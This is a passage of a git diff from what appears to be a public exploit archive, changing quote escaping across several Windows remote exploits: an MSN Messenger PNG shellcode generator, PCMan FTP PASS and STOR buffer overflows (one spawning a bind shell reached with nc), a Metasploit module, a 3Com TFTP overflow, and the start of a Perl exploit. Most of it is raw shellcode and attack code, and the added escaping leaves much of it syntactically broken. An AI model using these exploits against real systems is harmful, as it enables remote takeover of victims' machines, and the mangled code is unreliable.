+\"\\x39\\x1C\\xF6\\x7B\\x96\\x11\\x56\\x96\\x47\\x01\\x1C\\xF6\\x96\\x19\\x96\\x1C\\xF5\\xF4\\x1F\\x1D\"
+\"\\x1D\\x1D\\x2C\\xDD\\x94\\xF7\\x42\\x43\\x40\\x46\\xDE\\xF5\\x32\\xE2\\xE2\\xE2\\x70\\x75\\x75\\x33\"
+\"\\x78\\x65\\x78\\x1D\";
 
 FILE           *di;
 int            i = 0;
@@ -102,15 +102,15 @@ void main(int argc, char *argv[])
 
         if (argc < 3)
         {
-                printf("MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit\n");
-                printf("Bug discoveried by Core Security Technologies  (www.coresecurity.com)\n");
-                printf("Exploit coded By ATmaCA\n");
-                printf("Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved.\n");
-                printf("Web: http://www.atmacasoft.com\n");
-                printf("E-Mail: atmaca@icqmail.com\n");
-                printf("Credit to kozan and delikon\n\n");
-                printf("\tUsage:exploit <OutputPath> <Url>\n");
-                printf("\tExample:exploit vuln.png http://www.atmacasoft.com/exp/msg.exe\n");
+                printf(\"MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit\\n\");
+                printf(\"Bug discoveried by Core Security Technologies  (www.coresecurity.com)\\n\");
+                printf(\"Exploit coded By ATmaCA\\n\");
+                printf(\"Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved.\\n\");
+                printf(\"Web: http://www.atmacasoft.com\\n\");
+                printf(\"E-Mail: atmaca@icqmail.com\\n\");
+                printf(\"Credit to kozan and delikon\\n\\n\");
+                printf(\"\\tUsage:exploit <OutputPath> <Url>\\n\");
+                printf(\"\\tExample:exploit vuln.png http://www.atmacasoft.com/exp/msg.exe\\n\");
 
                 return;
         }
@@ -119,9 +119,9 @@ void main(int argc, char *argv[])
         web = argv[2];
 
 
-        if( (di=fopen(argv[1],"wb")) == NULL )
+        if( (di=fopen(argv[1],\"wb\")) == NULL )
         {
-                printf("Error opening file!\n");
+                printf(\"Error opening file!\\n\");
                 return;
         }
         for(i=0;i<sizeof(png_header)-1;i++)
@@ -132,13 +132,13 @@ void main(int argc, char *argv[])
                 fputc(NOP,di);
 
         weblength=(short int)0xff22;
-        pointer=strstr(shellcode,"\x22\xff");
+        pointer=strstr(shellcode,\"\\x22\\xff\");
         weblength-=strlen(web)+1;
         memcpy(pointer,&weblength,2);
         newshellcode = new char[sizeof(shellcode)+strlen(web)+1];
         strcpy(newshellcode,shellcode);
         strcat(newshellcode,Sifrele(web));
-        strcat(newshellcode,"\x1d");
+        strcat(newshellcode,\"\\x1d\");
 
         //shell code
         for(i=0;i<strlen(newshellcode);i++)
@@ -158,7 +158,7 @@ void main(int argc, char *argv[])
         for(i=0;i<sizeof(pngeof)-1;i++)
                 fputc(pngeof[i],di);
 
-        printf("Vulnarable png file %s has been generated!\n",argv[1]);
+        printf(\"Vulnarable png file %s has been generated!\\n\",argv[1]);
 
         fclose(di);
 }
diff --git a/platforms/windows/remote/27277.py b/platforms/windows/remote/27277.py
index afc377611..37e4602e0 100755
--- a/platforms/windows/remote/27277.py
+++ b/platforms/windows/remote/27277.py
@@ -3,7 +3,7 @@
 
 
 
-"""
+\"\"\"
 PCMAN FTPD 2.07 PASS Command Buffer Overflow
 Author: Ottomatik
 Date: 2013-07-31
@@ -13,46 +13,46 @@ Tested On: Windows 7 SP1 - French;
 Description:
     * The PASS Command is vulnerable to a buffer overflow;
     * Other commads may be vulnerable;
-"""
+\"\"\"
 
 # Modules import;
 
 import socket
 
 def main() :
-    """
+    \"\"\"
     Main function;
-    """
-    buf = "PASS "
-    buf += "A" * 6102 # JUNK
+    \"\"\"
+    buf = \"PASS \"
+    buf += \"A\" * 6102 # JUNK
     # 0x75670253
-    buf += "\x53\x02\x67\x75" # @ CALL ESP Kernel32.dll
-    buf += "\x90" * 40 # NOPs
+    buf += \"\\x53\\x02\\x67\\x75\" # @ CALL ESP Kernel32.dll
+    buf += \"\\x90\" * 40 # NOPs
     
     # ShellCode : msfpayload windows_exec calc.exe, bad chars = 00,0A,0C,0D
 
-    buf +=("\xdd\xc5\xd9\x74\x24\xf4\x5a\x31\xc9\xb8\xd1\x96\xc1\xcb\xb1"
-"\x33\x31\x42\x17\x83\xc2\x04\x03\x93\x85\x23\x3e\xef\x42\x2a"
-"\xc1\x0f\x93\x4d\x4b\xea\xa2\x5f\x2f\x7f\x96\x6f\x3b\x2d\x1b"
-"\x1b\x69\xc5\xa8\x69\xa6\xea\x19\xc7\x90\xc5\x9a\xe9\x1c\x89"
-"\x59\x6b\xe1\xd3\x8d\x4b\xd8\x1c\xc0\x8a\x1d\x40\x2b\xde\xf6"
-"\x0f\x9e\xcf\x73\x4d\x23\xf1\x53\xda\x1b\x89\xd6\x1c\xef\x23"
-"\xd8\x4c\x40\x3f\x92\x74\xea\x67\x03\x85\x3f\x74\x7f\xcc\x34"
-"\x4f\x0b\xcf\x9c\x81\xf4\xfe\xe0\x4e\xcb\xcf\xec\x8f\x0b\xf7"
-"\x0e\xfa\x67\x04\xb2\xfd\xb3\x77\x68\x8b\x21\xdf\xfb\x2b\x82"
-"\xde\x28\xad\x41\xec\x85\xb9\x0e\xf0\x18\x6d\x25\x0c\x90\x90"
-"\xea\x85\xe2\xb6\x2e\xce\xb1\xd7\x77\xaa\x14\xe7\x68\x12\xc8"
-"\x4d\xe2\xb0\x1d\xf7\xa9\xde\xe0\x75\xd4\xa7\xe3\x85\xd7\x87"
-"\x8b\xb4\x5c\x48\xcb\x48\xb7\x2d\x23\x03\x9a\x07\xac\xca\x4e"
-"\x1a\xb1\xec\xa4\x58\xcc\x6e\x4d\x20\x2b\x6e\x24\x25\x77\x28"
-"\xd4\x57\xe8\xdd\xda\xc4\x09\xf4\xb8\x8b\x99\x94\x10\x2e\x1a"
-"\x3e\x6d")
-    buf += "\r\n"
+    buf +=(\"\\xdd\\xc5\\xd9\\x74\\x24\\xf4\\x5a\\x31\\xc9\\xb8\\xd1\\x96\\xc1\\xcb\\xb1\"
+\"\\x33\\x31\\x42\\x17\\x83\\xc2\\x04\\x03\\x93\\x85\\x23\\x3e\\xef\\x42\\x2a\"
+\"\\xc1\\x0f\\x93\\x4d\\x4b\\xea\\xa2\\x5f\\x2f\\x7f\\x96\\x6f\\x3b\\x2d\\x1b\"
+\"\\x1b\\x69\\xc5\\xa8\\x69\\xa6\\xea\\x19\\xc7\\x90\\xc5\\x9a\\xe9\\x1c\\x89\"
+\"\\x59\\x6b\\xe1\\xd3\\x8d\\x4b\\xd8\\x1c\\xc0\\x8a\\x1d\\x40\\x2b\\xde\\xf6\"
+\"\\x0f\\x9e\\xcf\\x73\\x4d\\x23\\xf1\\x53\\xda\\x1b\\x89\\xd6\\x1c\\xef\\x23\"
+\"\\xd8\\x4c\\x40\\x3f\\x92\\x74\\xea\\x67\\x03\\x85\\x3f\\x74\\x7f\\xcc\\x34\"
+\"\\x4f\\x0b\\xcf\\x9c\\x81\\xf4\\xfe\\xe0\\x4e\\xcb\\xcf\\xec\\x8f\\x0b\\xf7\"
+\"\\x0e\\xfa\\x67\\x04\\xb2\\xfd\\xb3\\x77\\x68\\x8b\\x21\\xdf\\xfb\\x2b\\x82\"
+\"\\xde\\x28\\xad\\x41\\xec\\x85\\xb9\\x0e\\xf0\\x18\\x6d\\x25\\x0c\\x90\\x90\"
+\"\\xea\\x85\\xe2\\xb6\\x2e\\xce\\xb1\\xd7\\x77\\xaa\\x14\\xe7\\x68\\x12\\xc8\"
+\"\\x4d\\xe2\\xb0\\x1d\\xf7\\xa9\\xde\\xe0\\x75\\xd4\\xa7\\xe3\\x85\\xd7\\x87\"
+\"\\x8b\\xb4\\x5c\\x48\\xcb\\x48\\xb7\\x2d\\x23\\x03\\x9a\\x07\\xac\\xca\\x4e\"
+\"\\x1a\\xb1\\xec\\xa4\\x58\\xcc\\x6e\\x4d\\x20\\x2b\\x6e\\x24\\x25\\x77\\x28\"
+\"\\xd4\\x57\\xe8\\xdd\\xda\\xc4\\x09\\xf4\\xb8\\x8b\\x99\\x94\\x10\\x2e\\x1a\"
+\"\\x3e\\x6d\")
+    buf += \"\\r\\n\"
     
     clt_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-    clt_socket.connect(("127.0.0.1", 21))
+    clt_socket.connect((\"127.0.0.1\", 21))
     print clt_socket.recv(2048)
-    clt_socket.send("USER anonymous\r\n")
+    clt_socket.send(\"USER anonymous\\r\\n\")
     print clt_socket.recv(2048)
     clt_socket.send(buf)
     print clt_socket.recv(2048)
@@ -60,5 +60,5 @@ def main() :
     
 
 
-if __name__ == "__main__" :
+if __name__ == \"__main__\" :
     main()
diff --git a/platforms/windows/remote/27703.py b/platforms/windows/remote/27703.py
index 55bf4813c..03a7fd67b 100755
--- a/platforms/windows/remote/27703.py
+++ b/platforms/windows/remote/27703.py
@@ -14,70 +14,70 @@
 import socket, sys, os, time
 
 if len(sys.argv) != 3:
-        print "[*] Uso: %s <Ip Victima> <Puerto> \n" % sys.argv[0]
-        print "[*] Exploit created by Polunchis"
-        print "[*] https://www.intrusionlabs.org"
+        print \"[*] Uso: %s <Ip Victima> <Puerto> \\n\" % sys.argv[0]
+        print \"[*] Exploit created by Polunchis\"
+        print \"[*] https://www.intrusionlabs.org\"
         sys.exit(0)
 target = sys.argv[1]
 port = int(sys.argv[2])
 
-#msfpayload windows/shell_bind_tcp LPORT=28876 R | msfencode -a x86 -b '\x00\xff\x0a\x0d\x20\x40' -t c
+#msfpayload windows/shell_bind_tcp LPORT=28876 R | msfencode -a x86 -b \'\\x00\\xff\\x0a\\x0d\\x20\\x40\' -t c
 shellcode = (
-"\xda\xcf\xb8\xba\xb3\x1e\xe7\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
-"\x56\x31\x42\x18\x83\xc2\x04\x03\x42\xae\x51\xeb\x1b\x26\x1c"
-"\x14\xe4\xb6\x7f\x9c\x01\x87\xad\xfa\x42\xb5\x61\x88\x07\x35"
-"\x09\xdc\xb3\xce\x7f\xc9\xb4\x67\x35\x2f\xfa\x78\xfb\xef\x50"
-"\xba\x9d\x93\xaa\xee\x7d\xad\x64\xe3\x7c\xea\x99\x0b\x2c\xa3"
-"\xd6\xb9\xc1\xc0\xab\x01\xe3\x06\xa0\x39\x9b\x23\x77\xcd\x11"
-"\x2d\xa8\x7d\x2d\x65\x50\xf6\x69\x56\x61\xdb\x69\xaa\x28\x50"
-"\x59\x58\xab\xb0\x93\xa1\x9d\xfc\x78\x9c\x11\xf1\x81\xd8\x96"
-"\xe9\xf7\x12\xe5\x94\x0f\xe1\x97\x42\x85\xf4\x30\x01\x3d\xdd"
-"\xc1\xc6\xd8\x96\xce\xa3\xaf\xf1\xd2\x32\x63\x8a\xef\xbf\x82"
-"\x5d\x66\xfb\xa0\x79\x22\x58\xc8\xd8\x8e\x0f\xf5\x3b\x76\xf0"
-"\x53\x37\x95\xe5\xe2\x1a\xf2\xca\xd8\xa4\x02\x44\x6a\xd6\x30"
-"\xcb\xc0\x70\x79\x84\xce\x87\x7e\xbf\xb7\x18\x81\x3f\xc8\x31"
-"\x46\x6b\x98\x29\x6f\x13\x73\xaa\x90\xc6\xd4\xfa\x3e\xb8\x94"
-"\xaa\xfe\x68\x7d\xa1\xf0\x57\x9d\xca\xda\xee\x99\x04\x3e\xa3"
-"\x4d\x65\xc0\x33\x42\xe0\x26\xd9\x4a\xa5\xf1\x75\xa9\x92\xc9"
-"\xe2\xd2\xf0\x65\xbb\x44\x4c\x60\x7b\x6a\x4d\xa6\x28\xc7\xe5"
-"\x21\xba\x0b\x32\x53\xbd\x01\x12\x1a\x86\xc2\xe8\x72\x45\x72"
-"\xec\x5e\x3d\x17\x7f\x05\xbd\x5e\x9c\x92\xea\x37\x52\xeb\x7e"
-"\xaa\xcd\x45\x9c\x37\x8b\xae\x24\xec\x68\x30\xa5\x61\xd4\x16"
-"\xb5\xbf\xd5\x12\xe1\x6f\x80\xcc\x5f\xd6\x7a\xbf\x09\x80\xd1"
-"\x69\xdd\x55\x1a\xaa\x9b\x59\x77\x5c\x43\xeb\x2e\x19\x7c\xc4"
-"\xa6\xad\x05\x38\x57\x51\xdc\xf8\x67\x18\x7c\xa8\xef\xc5\x15"
-"\xe8\x6d\xf6\xc0\x2f\x88\x75\xe0\xcf\x6f\x65\x81\xca\x34\x21"
-"\x7a\xa7\x25\xc4\x7c\x14\x45\xcd"
+\"\\xda\\xcf\\xb8\\xba\\xb3\\x1e\\xe7\\xd9\\x74\\x24\\xf4\\x5a\\x33\\xc9\\xb1\"
+\"\\x56\\x31\\x42\\x18\\x83\\xc2\\x04\\x03\\x42\\xae\\x51\\xeb\\x1b\\x26\\x1c\"
+\"\\x14\\xe4\\xb6\\x7f\\x9c\\x01\\x87\\xad\\xfa\\x42\\xb5\\x61\\x88\\x07\\x35\"
+\"\\x09\\xdc\\xb3\\xce\\x7f\\xc9\\xb4\\x67\\x35\\x2f\\xfa\\x78\\xfb\\xef\\x50\"
+\"\\xba\\x9d\\x93\\xaa\\xee\\x7d\\xad\\x64\\xe3\\x7c\\xea\\x99\\x0b\\x2c\\xa3\"
+\"\\xd6\\xb9\\xc1\\xc0\\xab\\x01\\xe3\\x06\\xa0\\x39\\x9b\\x23\\x77\\xcd\\x11\"
+\"\\x2d\\xa8\\x7d\\x2d\\x65\\x50\\xf6\\x69\\x56\\x61\\xdb\\x69\\xaa\\x28\\x50\"
+\"\\x59\\x58\\xab\\xb0\\x93\\xa1\\x9d\\xfc\\x78\\x9c\\x11\\xf1\\x81\\xd8\\x96\"
+\"\\xe9\\xf7\\x12\\xe5\\x94\\x0f\\xe1\\x97\\x42\\x85\\xf4\\x30\\x01\\x3d\\xdd\"
+\"\\xc1\\xc6\\xd8\\x96\\xce\\xa3\\xaf\\xf1\\xd2\\x32\\x63\\x8a\\xef\\xbf\\x82\"
+\"\\x5d\\x66\\xfb\\xa0\\x79\\x22\\x58\\xc8\\xd8\\x8e\\x0f\\xf5\\x3b\\x76\\xf0\"
+\"\\x53\\x37\\x95\\xe5\\xe2\\x1a\\xf2\\xca\\xd8\\xa4\\x02\\x44\\x6a\\xd6\\x30\"
+\"\\xcb\\xc0\\x70\\x79\\x84\\xce\\x87\\x7e\\xbf\\xb7\\x18\\x81\\x3f\\xc8\\x31\"
+\"\\x46\\x6b\\x98\\x29\\x6f\\x13\\x73\\xaa\\x90\\xc6\\xd4\\xfa\\x3e\\xb8\\x94\"
+\"\\xaa\\xfe\\x68\\x7d\\xa1\\xf0\\x57\\x9d\\xca\\xda\\xee\\x99\\x04\\x3e\\xa3\"
+\"\\x4d\\x65\\xc0\\x33\\x42\\xe0\\x26\\xd9\\x4a\\xa5\\xf1\\x75\\xa9\\x92\\xc9\"
+\"\\xe2\\xd2\\xf0\\x65\\xbb\\x44\\x4c\\x60\\x7b\\x6a\\x4d\\xa6\\x28\\xc7\\xe5\"
+\"\\x21\\xba\\x0b\\x32\\x53\\xbd\\x01\\x12\\x1a\\x86\\xc2\\xe8\\x72\\x45\\x72\"
+\"\\xec\\x5e\\x3d\\x17\\x7f\\x05\\xbd\\x5e\\x9c\\x92\\xea\\x37\\x52\\xeb\\x7e\"
+\"\\xaa\\xcd\\x45\\x9c\\x37\\x8b\\xae\\x24\\xec\\x68\\x30\\xa5\\x61\\xd4\\x16\"
+\"\\xb5\\xbf\\xd5\\x12\\xe1\\x6f\\x80\\xcc\\x5f\\xd6\\x7a\\xbf\\x09\\x80\\xd1\"
+\"\\x69\\xdd\\x55\\x1a\\xaa\\x9b\\x59\\x77\\x5c\\x43\\xeb\\x2e\\x19\\x7c\\xc4\"
+\"\\xa6\\xad\\x05\\x38\\x57\\x51\\xdc\\xf8\\x67\\x18\\x7c\\xa8\\xef\\xc5\\x15\"
+\"\\xe8\\x6d\\xf6\\xc0\\x2f\\x88\\x75\\xe0\\xcf\\x6f\\x65\\x81\\xca\\x34\\x21\"
+\"\\x7a\\xa7\\x25\\xc4\\x7c\\x14\\x45\\xcd\"
 )
 
 # 7C86467B   FFE4             JMP ESP
 # JMP ESP KERNEL32.DLL
-garbage= '\x41' * 2005
-jmpesp= '\x7B\x46\x86\x7C'
-fixstack= '\x83\xc4\x9c'
-vulparameter= '/../'
-nop='\x90' *4
+garbage= \'\\x41\' * 2005
+jmpesp= \'\\x7B\\x46\\x86\\x7C\'
+fixstack= \'\\x83\\xc4\\x9c\'
+vulparameter= \'/../\'
+nop=\'\\x90\' *4
 
 buffer = garbage + jmpesp + nop + fixstack + shellcode
 
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-print "[+] Connect to %s on port %d" % (target,port)
+print \"[+] Connect to %s on port %d\" % (target,port)
 try:
 	s.connect((target,port))
         s.recv(1024)
-	s.send('USER anonymous\r\n') 
+	s.send(\'USER anonymous\\r\\n\') 
 	s.recv(1024)
-	s.send('PASS polunchis\r\n')
+	s.send(\'PASS polunchis\\r\\n\')
 	s.recv(1024)
-	s.send("STOR " + vulparameter + buffer + "\r\n")
-        print "[+] Sending payload of size", len(buffer) 
+	s.send(\"STOR \" + vulparameter + buffer + \"\\r\\n\")
+        print \"[+] Sending payload of size\", len(buffer) 
 	s.close()
-	print "[+] Exploit Sent Successfully"
-	print "[+] Waiting for 5 sec before spawning shell to " + target + ":28876\r"
-	print "\r"
+	print \"[+] Exploit Sent Successfully\"
+	print \"[+] Waiting for 5 sec before spawning shell to \" + target + \":28876\\r\"
+	print \"\\r\"
 	time.sleep(5)
-	os.system ("nc -n " + target + " 28876")
-	print "[-] Connection lost from " + target + ":28876 \r"
+	os.system (\"nc -n \" + target + \" 28876\")
+	print \"[-] Connection lost from \" + target + \":28876 \\r\"
 except:
-	print "[-] Could not connect to " + target + ":21\r"
+	print \"[-] Could not connect to \" + target + \":21\\r\"
         sys.exit(0) 
diff --git a/platforms/windows/remote/28328.rb b/platforms/windows/remote/28328.rb
index 7f8e72d47..f4d9696a1 100755
--- a/platforms/windows/remote/28328.rb
+++ b/platforms/windows/remote/28328.rb
@@ -5,7 +5,7 @@
 #   http://metasploit.com/
 ##
 
-require 'msf/core'
+require \'msf/core\'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = AverageRanking
@@ -14,49 +14,49 @@ class Metasploit3 < Msf::Exploit::Remote
 	
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'PCMAN FTP Server STOR Command Stack Overflow',
-			'Description'    => %q{
+			\'Name\'           => \'PCMAN FTP Server STOR Command Stack Overflow\',
+			\'Description\'    => %q{
 						This module exploits a buffer overflow vulnerability
 						found in the STOR command of the PCMAN FTP v2.07 Server
-						when the "/../" parameters are also sent to the server.
+						when the \"/../\" parameters are also sent to the server.
 			},
-			'Author'         => [
-						'Christian (Polunchis) Ramirez',	# Initial Discovery
-						'Rick (nanotechz9l) Flores',		# Metasploit Module                             
+			\'Author\'         => [
+						\'Christian (Polunchis) Ramirez\',	# Initial Discovery
+						\'Rick (nanotechz9l) Flores\',		# Metasploit Module                             
 					],
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision: $',
-			'References'     =>
+			\'License\'        => MSF_LICENSE,
+			\'Version\'        => \'$Revision: $\',
+			\'References\'     =>
 				[
-					[ 'URL', 'http://www.exploit-db.com/exploits/27703/' ],
+					[ \'URL\', \'http://www.exploit-db.com/exploits/27703/\' ],
 				],
-			'DefaultOptions' =>
+			\'DefaultOptions\' =>
 				{
-					'EXITFUNC' => 'process',
+					\'EXITFUNC\' => \'process\',
 				},
-			'Payload'        =>
+			\'Payload\'        =>
 				{
-					'Space' 		=> 1000,
-					'BadChars' 		=> "\x00\xff\x0a\x0d\x20\x40",
+					\'Space\' 		=> 1000,
+					\'BadChars\' 		=> \"\\x00\\xff\\x0a\\x0d\\x20\\x40\",
 				},
-			'Platform'       => 'win',
-			'Targets'        =>
+			\'Platform\'       => \'win\',
+			\'Targets\'        =>
 				[
-					[ 'Windows XP SP3', 
+					[ \'Windows XP SP3\', 
 						{ 
-							'Ret' => 0x7C91FCD8, # jmp esp from kernel32.dll
-							'Offset' => 2002
+							\'Ret\' => 0x7C91FCD8, # jmp esp from kernel32.dll
+							\'Offset\' => 2002
 						} 
 					],
 				],
-			'DisclosureDate' => 'Jul 17 2011',
-			'DefaultTarget'	=> 0))
+			\'DisclosureDate\' => \'Jul 17 2011\',
+			\'DefaultTarget\'	=> 0))
 	end
 	
 	def check
 	connect
 	disconnect
-	if (banner =~ /220 PCMan's FTP Server 2.0/)
+	if (banner =~ /220 PCMan\'s FTP Server 2.0/)
 		return Exploit::CheckCode::Vulnerable
 		end
 		return Exploit::CheckCode::Safe
@@ -64,11 +64,11 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 		connect_login
-		print_status("Trying victim #{target.name}...")		
-		sploit = "\x41" * 2002 + [target.ret].pack('V') + make_nops(4) + "\x83\xc4\x9c" + payload.encoded
+		print_status(\"Trying victim #{target.name}...\")		
+		sploit = \"\\x41\" * 2002 + [target.ret].pack(\'V\') + make_nops(4) + \"\\x83\\xc4\\x9c\" + payload.encoded
 		sploit << make_nops(4)
 		sploit << payload.encoded
-		send_cmd( ['STOR', '/../' + sploit], false )
+		send_cmd( [\'STOR\', \'/../\' + sploit], false )
 		handler
 		disconnect
 	end
diff --git a/platforms/windows/remote/2865.rb b/platforms/windows/remote/2865.rb
index df46eb410..5971408c8 100755
--- a/platforms/windows/remote/2865.rb
+++ b/platforms/windows/remote/2865.rb
@@ -11,34 +11,34 @@
 # ruby 3comftpd_xpsp2.rb <victimhost> <victimport>
 # Default port is 69 if not specified
 
-require 'socket'
+require \'socket\'
 
 # win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
 
-sc1 = "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x02"
-sc1 += "\xaf\xbb\x16\x83\xeb\xfc\xe2\xf4\xfe\xc5\x50\x5b\xea\x56\x44\xe9"
-sc1 +="\xfd\xcf\x30\x7a\x26\x8b\x30\x53\x3e\x24\xc7\x13\x7a\xae\x54\x9d"
-sc1 +="\x4d\xb7\x30\x49\x22\xae\x50\x5f\x89\x9b\x30\x17\xec\x9e\x7b\x8f"
-sc1 +="\xae\x2b\x7b\x62\x05\x6e\x71\x1b\x03\x6d\x50\xe2\x39\xfb\x9f\x3e"
-sc1 +="\x77\x4a\x30\x49\x26\xae\x50\x70\x89\xa3\xf0\x9d\x5d\xb3\xba\xfd"
-sc1 +="\x01\x83\x30\x9f\x6e\x8b\xa7\x77\xc1\x9e\x60\x72\x89\xec\x8b\x9d"
-sc1 +="\x42\xa3\x30\x66\x1e\x02\x30\x56\x0a\xf1\xd3\x98\x4c\xa1\x57\x46"
-sc1 +="\xfd\x79\xdd\x45\x64\xc7\x88\x24\x6a\xd8\xc8\x24\x5d\xfb\x44\xc6"
-sc1 +="\x6a\x64\x56\xea\x39\xff\x44\xc0\x5d\x26\x5e\x70\x83\x42\xb3\x14"
-sc1 +="\x57\xc5\xb9\xe9\xd2\xc7\x62\x1f\xf7\x02\xec\xe9\xd4\xfc\xe8\x45"
-sc1 +="\x51\xfc\xf8\x45\x41\xfc\x44\xc6\x64\xc7\xaa\x4a\x64\xfc\x32\xf7"
-sc1 +="\x97\xc7\x1f\x0c\x72\x68\xec\xe9\xd4\xc5\xab\x47\x57\x50\x6b\x7e"
-sc1 +="\xa6\x02\x95\xff\x55\x50\x6d\x45\x57\x50\x6b\x7e\xe7\xe6\x3d\x5f"
-sc1 +="\x55\x50\x6d\x46\x56\xfb\xee\xe9\xd2\x3c\xd3\xf1\x7b\x69\xc2\x41"
-sc1 +="\xfd\x79\xee\xe9\xd2\xc9\xd1\x72\x64\xc7\xd8\x7b\x8b\x4a\xd1\x46"
-sc1 +="\x5b\x86\x77\x9f\xe5\xc5\xff\x9f\xe0\x9e\x7b\xe5\xa8\x51\xf9\x3b"
-sc1 +="\xfc\xed\x97\x85\x8f\xd5\x83\xbd\xa9\x04\xd3\x64\xfc\x1c\xad\xe9"
-sc1 +="\x77\xeb\x44\xc0\x59\xf8\xe9\x47\x53\xfe\xd1\x17\x53\xfe\xee\x47"
-sc1 +="\xfd\x7f\xd3\xbb\xdb\xaa\x75\x45\xfd\x79\xd1\xe9\xfd\x98\x44\xc6"
-sc1 +="\x89\xf8\x47\x95\xc6\xcb\x44\xc0\x50\x50\x6b\x7e\xf2\x25\xbf\x49"
-sc1 +="\x51\x50\x6d\xe9\xd2\xaf\xbb\x16"
+sc1 = \"\\x2b\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x02\"
+sc1 += \"\\xaf\\xbb\\x16\\x83\\xeb\\xfc\\xe2\\xf4\\xfe\\xc5\\x50\\x5b\\xea\\x56\\x44\\xe9\"
+sc1 +=\"\\xfd\\xcf\\x30\\x7a\\x26\\x8b\\x30\\x53\\x3e\\x24\\xc7\\x13\\x7a\\xae\\x54\\x9d\"
+sc1 +=\"\\x4d\\xb7\\x30\\x49\\x22\\xae\\x50\\x5f\\x89\\x9b\\x30\\x17\\xec\\x9e\\x7b\\x8f\"
+sc1 +=\"\\xae\\x2b\\x7b\\x62\\x05\\x6e\\x71\\x1b\\x03\\x6d\\x50\\xe2\\x39\\xfb\\x9f\\x3e\"
+sc1 +=\"\\x77\\x4a\\x30\\x49\\x26\\xae\\x50\\x70\\x89\\xa3\\xf0\\x9d\\x5d\\xb3\\xba\\xfd\"
+sc1 +=\"\\x01\\x83\\x30\\x9f\\x6e\\x8b\\xa7\\x77\\xc1\\x9e\\x60\\x72\\x89\\xec\\x8b\\x9d\"
+sc1 +=\"\\x42\\xa3\\x30\\x66\\x1e\\x02\\x30\\x56\\x0a\\xf1\\xd3\\x98\\x4c\\xa1\\x57\\x46\"
+sc1 +=\"\\xfd\\x79\\xdd\\x45\\x64\\xc7\\x88\\x24\\x6a\\xd8\\xc8\\x24\\x5d\\xfb\\x44\\xc6\"
+sc1 +=\"\\x6a\\x64\\x56\\xea\\x39\\xff\\x44\\xc0\\x5d\\x26\\x5e\\x70\\x83\\x42\\xb3\\x14\"
+sc1 +=\"\\x57\\xc5\\xb9\\xe9\\xd2\\xc7\\x62\\x1f\\xf7\\x02\\xec\\xe9\\xd4\\xfc\\xe8\\x45\"
+sc1 +=\"\\x51\\xfc\\xf8\\x45\\x41\\xfc\\x44\\xc6\\x64\\xc7\\xaa\\x4a\\x64\\xfc\\x32\\xf7\"
+sc1 +=\"\\x97\\xc7\\x1f\\x0c\\x72\\x68\\xec\\xe9\\xd4\\xc5\\xab\\x47\\x57\\x50\\x6b\\x7e\"
+sc1 +=\"\\xa6\\x02\\x95\\xff\\x55\\x50\\x6d\\x45\\x57\\x50\\x6b\\x7e\\xe7\\xe6\\x3d\\x5f\"
+sc1 +=\"\\x55\\x50\\x6d\\x46\\x56\\xfb\\xee\\xe9\\xd2\\x3c\\xd3\\xf1\\x7b\\x69\\xc2\\x41\"
+sc1 +=\"\\xfd\\x79\\xee\\xe9\\xd2\\xc9\\xd1\\x72\\x64\\xc7\\xd8\\x7b\\x8b\\x4a\\xd1\\x46\"
+sc1 +=\"\\x5b\\x86\\x77\\x9f\\xe5\\xc5\\xff\\x9f\\xe0\\x9e\\x7b\\xe5\\xa8\\x51\\xf9\\x3b\"
+sc1 +=\"\\xfc\\xed\\x97\\x85\\x8f\\xd5\\x83\\xbd\\xa9\\x04\\xd3\\x64\\xfc\\x1c\\xad\\xe9\"
+sc1 +=\"\\x77\\xeb\\x44\\xc0\\x59\\xf8\\xe9\\x47\\x53\\xfe\\xd1\\x17\\x53\\xfe\\xee\\x47\"
+sc1 +=\"\\xfd\\x7f\\xd3\\xbb\\xdb\\xaa\\x75\\x45\\xfd\\x79\\xd1\\xe9\\xfd\\x98\\x44\\xc6\"
+sc1 +=\"\\x89\\xf8\\x47\\x95\\xc6\\xcb\\x44\\xc0\\x50\\x50\\x6b\\x7e\\xf2\\x25\\xbf\\x49\"
+sc1 +=\"\\x51\\x50\\x6d\\xe9\\xd2\\xaf\\xbb\\x16\"
 
-jmp = "\x63\x20\xdc\x77" # jmp esi user32.dll xp sp 2 english
+jmp = \"\\x63\\x20\\xdc\\x77\" # jmp esi user32.dll xp sp 2 english
 
 host = ARGV[0]
 port = 69
@@ -49,22 +49,22 @@ end
 
 sock = UDPSocket.new()
 
-puts "[+]Trying to connect to #{host}"
+puts \"[+]Trying to connect to #{host}\"
 if (not sock.connect(host,port))
-	raise "Unable to connect to #{host}"
+	raise \"Unable to connect to #{host}\"
 end
 
-exploit  = "\x00\x02"
-exploit += "a"
-exploit += "\x00"
-exploit += "\x90"* 129 
+exploit  = \"\\x00\\x02\"
+exploit += \"a\"
+exploit += \"\\x00\"
+exploit += \"\\x90\"* 129 
 exploit += sc1 
 exploit += jmp
-exploit += "\x00"
+exploit += \"\\x00\"
 
-puts "[+] Connected ... Sending exploit to victim"
+puts \"[+] Connected ... Sending exploit to victim\"
 sock.send exploit,0
 
-puts "[+] Exploit sended.. Now telnet on port 4444 for your shell"
+puts \"[+] Exploit sended.. Now telnet on port 4444 for your shell\"
 
 # milw0rm.com [2006-11-30]
diff --git a/platforms/windows/remote/2887.pl b/platforms/windows/remote/2887.pl
index 24222c07c..951094596 100755
--- a/platforms/windows/remote/2887.pl
+++ b/platforms/windows/remote/2887.pl
@@ -10,49 +10,49 @@ use IO::Socket;
 
 if(!($ARGV[1]))
 {
- print "Uso: atftp-19.pl <victim> <port>\n\n";
+ print \\\"Uso: atftp-19.pl <victim> <port>\\\\n\\\\n\\\";
  exit;
 }
 
 
 
